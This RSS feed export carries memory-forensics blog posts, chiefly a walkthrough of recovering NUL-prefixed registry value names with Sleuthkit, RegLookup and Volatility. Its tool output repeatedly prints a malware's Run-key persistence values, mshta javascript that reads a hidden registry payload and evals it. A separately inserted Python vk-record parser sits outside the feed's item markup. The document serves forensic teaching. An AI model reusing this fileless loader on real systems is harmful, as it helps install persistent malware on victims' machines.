<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>Registry Value Names Starting with NULL Characters</title><description>2016-01-29 23:09:38 - JL's stuff : Recently someone asked on a mailing list how to extract the registry value names created by a particular piece of malware. The issue was a NULL (0x00) character at the beginning of each value name, which prevented regedit from opening the registry key: the Win32 registry APIs that regedit uses treat names as NUL-terminated strings, so a name that begins with a NUL looks empty to them, while the kernel stores the name with an explicit length and keeps it intact. The name is actually there, and consists of the NULL character followed by some other hex digits, and you can extract it from the raw registry itself (from disk and memory). We'll cover how to accomplish these tasks, and then we'll cover how to do the same across the enterprise, as was asked in a follow-up question.

Background
----------
The malware in question is referenced in a report by Symantec as well as one by REAQTA. We see two different registry values depending on whether or not PowerShell is available on the machine. Either way, the registry keys and values created by the malware are present in the user's personal registry hive (NTUSER.DAT).

Extracting the Registry
-----------------------
For this part, you may use anything that allows you to pull the registry file from the disk. Some example tools are:
- FTK Imager
- X-Ways
- EnCase
- Sleuthkit (or Autopsy if you need a GUI)

We're going to use the Sleuthkit to extract the registry file from the local disk in this case (the process would be the same for an offline or remote disk; only the disk name would differ). First we need to figure out the offset of the NTFS volume. To do that we use the mmls utility; its invocation is on line 1 below. The volume offset is on line 9, and we see that it is the only NTFS volume on this disk. Next, we need the unique identifier (inode) of the NTUSER.DAT registry file for the user who ran the malware (lines 11-23). After we've identified the inode number for the registry file (372), we extract it from the disk so that we may process it offline (line 26).

 1  mmls \\.\PhysicalDrive0
 2  DOS Partition Table
 3  Offset Sector: 0
 4  Units are in 512-byte sectors
 5
 6       Slot    Start        End          Length       Description
 7  00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
 8  01:  -----   0000000000   0000002047   0000002048   Unallocated
 9  02:  00:00   0000002048   0033552383   0033550336   NTFS (0x07)
10
11  fls -o 2048 -p -r \\.\physicaldrive0 &gt; paths.txt
12
13  findstr /i ntuser paths.txt
14
15  r/r 10772-128-4:  Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
16  r/r 41237-128-3:  Users/Default/NTUSER.DAT
17  r/r 41238-128-4:  Users/Default/NTUSER.DAT.LOG
18  r/r 10768-128-4:  Users/Default/NTUSER.DAT.LOG1
19  r/r 41321-128-1:  Users/Default/NTUSER.DAT.LOG2
20  r/r 10563-128-4:  Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
21  r/r 10773-128-4:  Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
22  r/r 433-128-1:    Users/user/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
23  r/r 372-128-1:    Users/user/NTUSER.DAT
24  [snip]
25
26  icat -o 2048 \\.\physicaldrive0 372 &gt; ntuser-win7x86

Print Keys and Values
---------------------
Once we have the extracted registry file, we're able to print out the registry key and its values using any offline tool at our disposal. Here are a few:
- RegLookup
- Python-Registry
- RegRipper
- Mitec WRR

RegLookup is a nice utility for printing out registry data. You can see example output for the Run key below; note, however, that the value name is not printed. We are able to see everything else.

 $ reglookup -p 'Software/Microsoft/Windows/CurrentVersion/Run' NTUSER-Win7x86.DAT
 PATH,TYPE,VALUE,MTIME
 /Software/Microsoft/Windows/CurrentVersion/Run,KEY,,2016-01-15 21:49:46
 /Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:roh0Urp=\x22ehdEAR8I\x22;G9p=new%20ActiveXObject(\x22WScript.Shell\x22);c7r6vhuiFM=\x22moDW7uoJ5\x22;ibh29z=G9p.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);bZU38ElgI=\x229g95uXT\x22;eval(ibh29z);v4SXZYYP=\x22x2\x22;,
 /Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:hCLkQp43l=\x22GRB\x22;w5s1=new%20ActiveXObject(\x22WScript.Shell\x22);dXx1Yr6f=\x22uk\x22;S6RUd=w5s1.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);JTMRIu3=\x227Vi\x22;eval(S6RUd);Jkxju49At=\x225S\x22;,

I also wrote a script that uses Python-Registry to print out registry keys of interest. You can see example output from it below:

 $ python printkey.py NTUSER-Win7x86.DAT "Software\Microsoft\Windows\CurrentVersion\Run"
 Processing NTUSER-Win7x86.DAT
 cmi-createhive{6a1c4018-979d-4291-a7dc-7aed1c75b67c}\software\microsoft\windows\currentversion\run
 VALUENAME: 996883f7
 VALUE: mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
 VALUENAME: e4263fbd
 VALUE: mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
 Subkeys:

Harlan Carvey also wrote a RegRipper plugin to detect key and value names with NULL characters. Also, if you need a GUI, Eric Zimmerman's registry tool parses out these names correctly. So in short, you have a lot of options for parsing out these "broken" value names with offline tools: any parser that reads the name using the stored NameLength recovers it; only tools that hand the bytes to a NUL-terminated string routine lose it.

Printing Keys and Values Using Volatility
-----------------------------------------
As you may guess, you can also get this information using Volatility, but it might not be as straightforward at first. For our first attempt, we will try the printkey plugin. Notice that the value name is blank in the output below (left side of the colon):

 $ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 printkey -K "software\microsoft\windows\currentversion\run"
 Volatility Foundation Volatility Framework 2.5
 Legend: (S) = Stable   (V) = Volatile

 ----------------------------
 [snip]
 Registry: C:\Users\user\ntuser.dat
 Key name: Run (S)
 Last updated: 2016-01-15 21:49:45 UTC+0000

 Subkeys:

 Values:
 REG_SZ        : (S) mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
 REG_SZ        : (S) mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";

This is because of the way the String class was written. The actual name is still there, however, so we can extract it with volshell. In the session below, lines 4-7 import the RegistryApi and select the correct registry file (in this case for the user named "user"). Line 8 gets the key of interest, the Run key (defined on line 6). Lines 10-11 then loop through the raw values contained in that key and print the dt() output for each value. We can see on lines 15 and 25 that each of these value names has a length of 9, so we should be able to extract a name for these values. We can see the raw bytes of the name by calling v() on the member of interest, in this case the Name member of the value. On lines 34-35 we get the correct length for the value name, and on lines 36-37 we get the correct value name. We can then rerun our loop on line 39 to get the full information for these values.

 1  $ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 volshell
 2  [snip]
 3
 4  In [1]: import volatility.plugins.registry.registryapi as registryapi
 5  In [2]: regapi = registryapi.RegistryApi(self._config)
 6  In [3]: key = "software\\microsoft\\windows\\currentversion\\run"
 7  In [4]: regapi.set_current("NTUSER.DAT", "user")
 8  In [5]: item = regapi.reg_get_key(None, key)
 9
10  In [6]: for value, data in regapi.reg_yield_values(None, key, given_root = item, raw = True):
11     ...:     print dt(value)
12     ...:
13
14  0x0   : Signature                      vk
15  0x2   : NameLength                     9
16  0x4   : DataLength                     412
17  0x8   : Data                           511024
18  0xc   : Type                           1
19  0x10  : Flags                          1
20  0x12  : Spare                          28515
21  0x14  : Name
22  None
23
24  0x0   : Signature                      vk
25  0x2   : NameLength                     9
26  0x4   : DataLength                     378
27  0x8   : Data                           517464
28  0xc   : Type                           1
29  0x10  : Flags                          1
30  0x12  : Spare                          0
31  0x14  : Name
32  None
33
34  In [7]: len(value.Name.v())
35  Out[7]: 9
36  In [8]: print str(value.Name.v())
37  e4263fbd
38
39  In [9]: for value, data in regapi.reg_yield_values(None, key, given_root = item, raw = True): print value.Name.v(), data
    996883f7 mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
    e4263fbd mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";

Unfortunately, that's all the time we have for today, but we'll continue this thought sometime next week. Until then, here's a bit of homework for you to watch and a bit to read. Coming up next: Finding Interesting Registry Values Enterprise-wide.</description><link>http://www.secuobs.com/revue/news/596915.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/596915.shtml</guid></item>
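The item above recovers the hidden names from the raw _CM_KEY_VALUE (vk) record, once with Python-Registry and once with Volatility's dt() and v(). The following is an added example, not the post's printkey.py or Volatility code, that performs the same parse in plain Python 3 over a constructed vk record so the mechanism is visible without a hive or memory image: the name is read using the record's own NameLength (decoded as 8-bit characters or UTF-16LE according to the Flags bit), while a NUL-terminated read of the same bytes yields the empty string, which is what regedit and printkey displayed. The record layout is the one dt() printed above; the constructed record reuses the first Run value's header numbers (DataLength 412, Data 511024, Type 1, Flags 1, Spare 28515). The VALUE_COMP_NAME flag name and the inline-data rule (DataLength bit 31) come from the hive format rather than from the post, and the REG_* type lookup is this example's own.

```python
"""Recover a registry value name that begins with a NUL byte from its raw vk
record (the _CM_KEY_VALUE structure dt() printed above), without relying on
a NUL-terminated string API.

Added example; not the post's printkey.py or Volatility code. Layout:
0x00 Signature 'vk', 0x02 NameLength, 0x04 DataLength, 0x08 Data, 0x0c Type,
0x10 Flags, 0x12 Spare, 0x14 Name (NameLength bytes, no terminator).
"""

VK_HEADER_LEN = 0x14
VALUE_COMP_NAME = 0x0001   # Flags bit: name stored as 8-bit chars rather than UTF-16LE
REG_TYPE = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
            4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}   # this example's lookup


def _u16(buf, off):
    return int.from_bytes(buf[off:off + 2], "little")


def _u32(buf, off):
    return int.from_bytes(buf[off:off + 4], "little")


def parse_vk(cell):
    """Decode one vk record. The name is read with the record's counted
    NameLength, so a leading NUL is kept instead of truncating the name."""
    if cell[0:2] != b"vk":
        raise ValueError("not a vk record")
    name_len = _u16(cell, 0x02)
    flags = _u16(cell, 0x10)
    name_raw = cell[VK_HEADER_LEN:VK_HEADER_LEN + name_len]
    if len(name_raw) != name_len:
        raise ValueError("cell is shorter than NameLength")
    if flags % 2 == VALUE_COMP_NAME:
        name = name_raw.decode("latin-1")      # one byte per character
    else:
        name = name_raw.decode("utf-16-le")    # two bytes per character
    # DataLength with bit 31 set means the value data (4 bytes or less) is
    # stored in the Data field itself instead of in a separate cell.
    inline, data_len = divmod(_u32(cell, 0x04), 0x80000000)
    rtype = _u32(cell, 0x0c)
    return {
        "name": name,
        "name_hex": name_raw.hex(),
        "type": REG_TYPE.get(rtype, "0x%x" % rtype),
        "data_length": data_len,
        "data_inline": bool(inline),
        "data": cell[0x08:0x08 + data_len] if inline else None,
        "data_offset": None if inline else _u32(cell, 0x08),
    }


def c_string_view(name_raw):
    """What a NUL-terminated string API sees: the bytes up to the first NUL.
    For these values that is nothing, which is why regedit and printkey
    show a blank name."""
    return name_raw.split(b"\x00", 1)[0].decode("latin-1")


def escape_name(name):
    """Render a name for a report, writing the NUL as \\x00 rather than losing it."""
    return "".join(c if c.isprintable() else "\\x%02x" % ord(c) for c in name)


def build_sample_vk(name_raw, data_len=412, data_off=511024, rtype=1, flags=1, spare=28515):
    """Constructed vk record (not carved from the post's hive). The defaults are
    the header values dt() printed for the first Run value: DataLength 412,
    Data 511024, Type 1 (REG_SZ), Flags 1, Spare 28515."""
    return (b"vk" + len(name_raw).to_bytes(2, "little")
            + data_len.to_bytes(4, "little") + data_off.to_bytes(4, "little")
            + rtype.to_bytes(4, "little") + flags.to_bytes(2, "little")
            + spare.to_bytes(2, "little") + name_raw)


if __name__ == "__main__":
    for raw in (b"\x00996883f7", b"\x00e4263fbd"):   # the two Run value names from the post
        vk = parse_vk(build_sample_vk(raw))
        print("C-string view: %r" % c_string_view(raw))
        print("counted name:  %s (%d chars, hex %s, %s, %d data bytes at offset %d)" % (
            escape_name(vk["name"]), len(vk["name"]), vk["name_hex"],
            vk["type"], vk["data_length"], vk["data_offset"]))
```

When reporting such a name, keep the escaped form (the hex of the raw bytes is the unambiguous key for matching across hosts); a name that prints as empty in one tool and as a nine-character string in another is itself a useful indicator.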
<item><title>Volshell Quickies</title><description>Secuobs.com : 2015-06-03 18:44:43 - JL's stuff - Since someone had asked about it in a comment on this blog, I decided to write up a Volshell Quickie on the Volatility Labs blog. Enjoy!</description><link>http://www.secuobs.com/revue/news/572916.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/572916.shtml</guid></item>
<item><title>output files</title><description>Secuobs.com : 2015-05-20 20:00:22 - JL's stuff - https://goo.gl/TSede9</description><link>http://www.secuobs.com/revue/news/571429.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/571429.shtml</guid></item>
<item><title>Linux Memory Forensics: Using mprotect() with PROT_NONE</title><description>Secuobs.com : 2015-05-18 20:53:15 - JL's stuff - In case you didn't catch it on the Volatility Labs blog, I found an interesting bug that we've had in the framework since we've had Linux support. If you've had cases that involved Linux samples and plugins like linux_yarascan, linux_strings, etc., you might want to update to the latest code and have another look over those samples. Of course, there's no reason to think that a piece of malware might have used this trick and used a SIGSEGV handler to access the data, but the idea has been around for years.</description><link>http://www.secuobs.com/revue/news/571136.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/571136.shtml</guid></item>
<item><title>Some Updates</title><description>Secuobs.com : 2015-01-29 18:03:27 - JL's stuff - Wow, it's been a while since I've written here. A lot has happened since, however. Here are a few updates:

The Book
--------
We released a book: The Art of Memory Forensics. For those of you who are considering teaching memory forensics or even operating systems, we have a syllabus and evidence files on our website that you may use in your classes.

Trainings
---------
We have several trainings in line for this year, public and private. Public trainings currently include:
- Reston, VA: April 13th-17th 2015
- New York, NY: May 11th-15th 2015
- Amsterdam, NL: August 31st-September 4th 2015
We are also currently working on new course offerings coming out this year, so keep an eye out for those.

Talks
-----
I'll be speaking at the upcoming CEIC conference in Las Vegas on Wednesday, May 20th 2015. Apparently there is a discount code if you register before January 31st: JANS4v15. The Volatility team will also give another talk at NYC4SEC during the week of the training in NYC this coming May. More details will be given for that talk soon.</description><link>http://www.secuobs.com/revue/news/557160.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/557160.shtml</guid></item>
<item><title>Volatility Talk at Upcoming NYC4SEC</title><description>Secuobs.com : 2014-04-15 00:52:49 - JL's stuff - The Volatility team will give a talk at the next NYC4SEC meetup on memory forensics on May 8th, 2014 at John Jay College. Make sure to RSVP if you are planning to attend, since there is limited seating.

Thanks For the Memory: Rootkits, Exfil and APT - RAM Conquers All

The ability to perform digital investigations and incident response is becoming a critical skill for many occupations. Unfortunately, digital investigators frequently lack the training or experience to take advantage of the volatile artifacts found in physical memory. Volatile memory contains valuable information about the runtime state of the system, provides the ability to link artifacts from traditional forensic analysis (network, file system, registry), and provides the ability to ascertain investigative leads that have been unbeknownst to most analysts. Malicious adversaries have been leveraging this knowledge disparity to undermine many aspects of the digital investigation process with such things as anti-forensics techniques, memory resident malware, kernel rootkits, encryption (file systems, network traffic, etc.), and Trojan defenses. The only way to turn the tables and defeat a creative digital human adversary is through talented analysts. This talk demonstrates the importance of including volatile memory in your investigations with an overview of the most widely used memory forensics tool, Volatility, by its developers. - gleeda</description><link>http://www.secuobs.com/revue/news/508256.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/508256.shtml</guid></item>
<item><title>New Volatility Training Website</title><description>Secuobs.com : 2014-02-07 15:57:38 - JL's stuff - We have a new website for all of our Volatility training opportunities. Don't forget to check it out: http://www.memoryanalysis.net - gleeda</description><link>http://www.secuobs.com/revue/news/496610.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/496610.shtml</guid></item>
<item><title>OMFW 2013 Slides</title><description>Secuobs.com : 2014-01-30 15:07:35 - JL's stuff - In case you missed it, I put up my slides for my OMFW 2013 talk, "Every Step You Take: Profiling the System". You can find them here on Google Docs. Some of the animations may not render properly, even if played, but you get the idea. If you want to see the cyboxer plugin, send me an email: jamielevy (at) gmail.com</description><link>http://www.secuobs.com/revue/news/495033.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/495033.shtml</guid></item>
<item><title>Upcoming Events and Trainings</title><description>Secuobs.com : 2013-04-19 18:13:26 - JL's stuff - I have several speaking and training events coming up this year that may be of interest to others in the community.

I will be speaking at the New York Bankers Association's upcoming Annual Technology, Compliance &amp; Risk Management Forum on May 16th, 2013 on the topic of Incident Response and Digital Forensics. If you plan to attend, I'll see you there!

Also, we (Volatility) are holding our third run of Windows Malware and Memory Forensics in Reston, VA from Monday, June 10th through Friday, June 14th 2013. This training will not disappoint even the most proficient of forensic malware analysts. It includes real-world scenarios that are reinforced with hands-on labs. All students will leave with the skills and confidence to conduct investigations involving RAM samples from acquisition to the final report. Students also leave with more than just being Volatility power users; they leave with a deeper knowledge of memory forensics and malware analysis methodologies. Such knowledge is integral regardless of what tools you choose for future investigations, be they open source or commercial, and much more powerful than simply "run this tool, the output is colored red so it's bad". You'll leave the class with knowledge that will help you figure out if something really is "bad" or not. There are still a few seats left for this training, so if you are interested you should register soon. Send an email to voltraining (at) memoryanalysis.net for registration information.

If you are looking for a course that covers both disk and memory forensics, Andrew Case and I will teach our course in Digital Forensics and Incident Response again this summer at Black Hat Vegas. This course runs from July 27th through July 30th 2013 and will cover enough material to take someone from knowing practically nothing about digital forensics to a point where s/he can comfortably conduct his/her own investigations.

Also, we (Volatility) will hold another run of Windows Malware and Memory Forensics in the Netherlands from Monday, September 9th through Friday, September 13th 2013. Details will appear soon on the Volatility Labs blog.

Planning for the Open Memory Forensics Workshop (OMFW) is in progress. You should plan to attend if you want to know what's new and hot in the memory forensics space. OMFW is scheduled to take place on November 4th, 2013, one day prior to the Sleuth Kit and Open Source Digital Forensics Conference. Final details will appear soon on the Volatility Labs blog.</description><link>http://www.secuobs.com/revue/news/440658.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/440658.shtml</guid></item>
<item><title>The 1st Annual Volatility Framework Plugin Contest</title><description>Secuobs.com : 2013-01-14 22:15:43 - JL's stuff - Cross posted from the Volatility Labs Blog: We are pleased to announce the 1st Annual Volatility Plugin Contest. This contest is inspired by and modeled after the Hex-Rays Plugin Contest. As in the case of IDA, Volatility was designed with the belief that talented analysts should only be limited by their creativity, not the tools they use. In this spirit, Volatility has a flexible architecture that can be extended in numerous ways: analysis plugins (operating system plugins, application plugins, etc.), volshell commands, address spaces, profiles, or user interfaces. This contest is intended to inspire people to demonstrate their creativity, become a memory analysis pioneer, win the admiration of their peers, and give back to the community. The contest is straightforward: create an innovative and useful extension to The Volatility Framework and win the contest!

- 1st place wins one free seat at any future Windows Malware and Memory Forensics Training (or 1500 USD cash)
- 2nd place wins 500 USD cash
- 3rd place wins 250 USD cash
- 4th and 5th place win Volatility swag (T-shirts, stickers, etc.)

Everyone but the Volatility core developers can participate.

Rules of Engagement
1. The goal of the contest is to create innovative, interesting, and useful extensions for The Volatility Framework. While extensions written in Python are preferred, extensions written in other languages will also be considered.
2. The submitted extensions should work with the Volatility 2.2 (or greater) release and should have been implemented after the initial contest announcement (1/14/2013).
3. The top 5 winners of the contest will get the prizes mentioned above.
4. Volatility core developers are not eligible.
5. Submissions should be sent to volcon2013@memoryanalysis.net. The submission should include the source code, a short description of how the extension is used, and a signed Individual Contributor License Agreement.
6. By submitting an entry, you declare that you own the copyright to the source code and are authorized to submit it.
7. All submissions should be received no later than August 1, 2013. The winner will be announced the following week. We recommend submitting early. In the case of similar submissions, preference will be shown to early submissions.
8. The Volatility Project core developers will decide the winners based on the following criteria: creativity, usefulness, effort, completeness, submission date, and clarity of documentation.
9. In order to collect the cash prizes, the winner will need to provide a legal picture identification and bank account information within 30 days of notification. The bank transfer will be made within two weeks after the winner is authenticated.
10. Group entries are allowed; the prize will be paid (or the seat registered, if the training option is desired) to the person designated by the group.
11. Upon approval from the winners, their names/aliases will be listed on the "Volatility Hall of Fame" web page for the world to admire.
12. Selected contestants may also be asked to present their work at the 2013 Open Memory Forensics Workshop or have their research featured on the Volatility Labs Blog.

Acknowledgements: A special thanks goes out to the Hex-Rays team for providing the inspiration and template for this contest.</description><link>http://www.secuobs.com/revue/news/421708.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/421708.shtml</guid></item>
<item><title>Windows Malware and Memory Forensics Training in The Windy City</title><description>Secuobs.com : 2013-01-14 22:15:43 - JL's stuff - Cross posted from the Volatility Labs Blog: The next journey to the center of Windows Memory Forensics starts in Chicago this March! We are pleased to announce the second public offering of the Windows Malware and Memory Forensics Training by The Volatility Project. This is the only memory forensics course officially designed, sponsored, and taught by the Volatility developers. One of the main reasons we made Volatility open-source is to encourage and facilitate a deeper understanding of how memory analysis works, where the evidence originates, and how to interpret the data collected by the framework's extensive set of plugins. Now you can learn about these benefits first hand from the developers of the most powerful, flexible, and innovative memory forensics tool. Appraisal from your peers who attended the first course this past December is on the Volatility Labs post.

Please see the following details about the upcoming training event:
Dates: Monday, March 18th through Friday, March 22nd 2013
Location: Downtown Chicago, IL (exact location will be shared upon registration)
Instructors: Michael Ligh (iMHLv2), Andrew Case (attrc), Jamie Levy (gleeda)

For more information about the course, view the Volatility Training Flyer (to download a copy of the PDF, click File &gt; Download). To request a link to the online registration site or to receive a detailed course agenda/outline, please send an email to voltraining (at) memoryanalysis.net.</description><link>http://www.secuobs.com/revue/news/421707.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/421707.shtml</guid></item>
<item><title>ACSAC 2012</title><description>Secuobs.com : 2012-11-13 19:53:14 - JL's stuff - I will be teaching a full day course on Windows Forensics and IR at the Annual Computer Security Applications Conference (ACSAC) on December 4th at the Buena Vista Palace Hotel &amp; Spa in Orlando, FL. There is still time to sign up for the conference and/or training, and it looks like a good program this year.</description><link>http://www.secuobs.com/revue/news/411183.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/411183.shtml</guid></item>
<item><title>Week 3 of the Month of Volatility Plugins posted</title><description>Secuobs.com : 2012-09-30 02:08:32 - JL's stuff - Cross listed from Andrew Case's blog: I was writing to announce that week 3 of the Month of Volatility Plugins is finished, and we now have five more in-depth blog posts covering Windows and Linux internals and rootkit detection, as well as a bonus plugin that analyzes Internet Explorer browsing history. These have all been posted on the Volatility Labs blog.

Post 1: Detecting Malware Hooks in the Windows GUI Subsystem
This Windows focused post covers detecting malware hooks in the Windows GUI subsystem, including message hooks and event hooks, and what effects these hooks can have on a compromised system.
http://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

Post 2: Shellbags in Memory, SetRegTime, and TrueCrypt Volumes
This Windows focused post covers finding and recovering shellbags from memory, the forensic importance of shellbags, and analyzes the effects of anti-forensics on shellbag timestamps. It concludes by covering the traces left in shellbags by TrueCrypt.
http://volatility-labs.blogspot.com/2012/09/movp-32-shellbags-in-memory-setregtime.html

Post 3: Analyzing USER Handles and the Win32k.sys Gahti
This Windows focused post introduces two new plugins: one named gahti that determines the various different types of USER objects on a system, and another named userhandles which traverses the handle table entries and associates them with the owning processes or threads.
http://volatility-labs.blogspot.com/2012/09/movp-33-analyzing-user-handles-and.html

Post 4: Recovering tagCLIPDATA: What's In Your Clipboard?
This Windows focused post covers recovery of the Windows clipboard from physical memory.
http://volatility-labs.blogspot.com/2012/09/movp-34-recovering-tagclipdata-whats-in.html

Post 5: Analyzing the 2008 DFRWS Challenge with Volatility
This Linux focused post analyzes the 2008 memory challenge with Volatility. It walks through the artifacts produced by the winning team and shows how to recover the same information with Volatility. It then shows plugins in Volatility that can recover artifacts not produced by the winning team.
http://volatility-labs.blogspot.com/2012/09/movp-35-analyzing-2008-dfrws-challenge.html

Bonus Post: HowTo: Scan for Internet Cache/History and URLs
This Windows focused post covers how to recover Internet Explorer's cache and history from a memory sample.
http://volatility-labs.blogspot.com/2012/09/howto-scan-for-internet-cachehistory.html

If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.</description><link>http://www.secuobs.com/revue/news/402600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/402600.shtml</guid></item>
<item><title>Week 2 of the Month of Volatility Plugins posted</title><description>Secuobs.com : 2012-09-21 17:25:19 - JL's stuff - It's been an exciting week in the Volatility community. We've just finished our second week of Month of Volatility Plugins (MoVP) blog posts, released Volatility 2.2 RC2 for testing, fixed a few minor bugs, and now we're gearing up for our third week of posts and the upcoming Open Memory Forensics Workshop (OMFW). Here is a list of this week's posts, compiled by Andrew Case: I was writing to announce that week 2 of the Month of Volatility Plugins is finished, and we now have five more in-depth blog posts covering Windows and Linux internals and rootkit detection. These have all been posted to the new Volatility Labs blog.

Post 1: Atoms (The New Mutex), Classes and DLL Injection
This Windows focused post covers investigating malware and understanding infections by analyzing the atom tables.
http://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html

Post 2: Malware in your Windows
This Windows focused post covers enumerating and analyzing windows in the GUI subsystem.
http://volatility-labs.blogspot.com/2012/09/movp-22-malware-in-your-windows.html

Post 3: Event Logs and Service SIDs
This Windows focused post demonstrates recovering event logs from memory and calculating service SIDs.
http://volatility-labs.blogspot.com/2012/09/movp-23-event-logs-and-service-sids.html

Post 4: Analyzing the Jynx rootkit and LD_PRELOAD
This Linux focused post covers analyzing the Jynx rootkit as well as generic methods for analyzing LD_PRELOAD based rootkits.
http://volatility-labs.blogspot.com/2012/09/movp-24-analyzing-jynx-rootkit-and.html

Post 5: Investigating In-Memory Network Data with Volatility
This Linux focused post goes through each of the Linux Volatility plugins related to recovering network data from memory, such as network connections, packets, and the routing cache.
http://volatility-labs.blogspot.com/2012/09/movp-25-investigating-in-memory-network.html

If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog. We hope you've enjoyed this week's series. Stay tuned, we have much more in store!</description><link>http://www.secuobs.com/revue/news/401084.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/401084.shtml</guid></item>
<item><title>Week 1 of the Month of Volatility Plugins posted</title><description>Secuobs.com : 2012-09-14 19:24:44 - JL's stuff - I'm going to borrow from Andrew's blog here to let you know about our Month of Volatility Plugins: I was writing to announce that week 1 of the Month of Volatility Plugins is finished, and we now have five in-depth blog posts covering Windows and Linux internals and rootkit detection. These have all been posted to the new Volatility Labs blog.

Post 1: Logon Sessions, Processes, and Images
This Windows focused post covers linking processes to their logon session, detecting hidden processes using session structures, and determining the drivers mapped into each session.
http://volatility-labs.blogspot.com/2012/09/movp-11-logon-sessions-processes-and.html

Post 2: Window Stations and Clipboard Malware
This Windows focused post covers enumerating and analyzing window stations and clipboard monitoring malware.
http://volatility-labs.blogspot.com/2012/09/movp-12-window-stations-and-clipboard.html

Post 3: Desktops, Heaps, and Ransomware
This Windows focused post covers finding rogue desktops used to hide applications and created by ransomware, linking threads to desktops, analyzing the desktop heap for memory corruptions, and profiling heap allocations to locate USER objects.
http://volatility-labs.blogspot.com/2012/09/movp-13-desktops-heaps-and-ransomware.html

Post 4: Average Coder Rootkit, Bash History, and Elevated Processes
This Linux focused post covers analyzing the Average Coder rootkit, recovering bash_history from memory (even when faced with anti-forensics), and finding elevated processes.
http://volatility-labs.blogspot.com/2012/09/movp-14-average-coder-rootkit-bash.html

Post 5: KBeast Rootkit, Detecting Hidden Modules, and sysfs
This Linux focused post covers analyzing the KBeast rootkit, finding modules unlinked from the module list, and the forensic value of sysfs.
http://volatility-labs.blogspot.com/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html

If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog. Future Volatility posts will appear on our official blog: http://volatility-labs.blogspot.com/ Also, you might want to follow our project on Twitter, @Volatility, for updates and news. See you at OMFW!</description><link>http://www.secuobs.com/revue/news/399729.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/399729.shtml</guid></item>
<item><title>Job File Parser</title><description>Secuobs.com : 2012-09-02 01:49:47 - JL's stuff - While writing material for the Blackhat training course that Andrew Case and I gave this summer, I realized that there did not appear to be many tools that would parse job files. At that time, Harlan Carvey had written a blogpost on job files and had mentioned them as part of his timeline materials, but he had not yet released his Perl script (it has since been released here). This prompted me to write up a parser of my own in Python.

Job files consist of two sections: (1) Fixed Length and (2) Variable Length. The MSDN documentation is fairly good for letting us know how to parse out these sections. So what does a job file look like?

$ xxd At5.job
0000000: 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5
0000010: fa64 cfd2 4600 cc00 0000 0000 3c00 0a00
[snip]

The fields annotated in this file include:
- User Name Length: 0x7
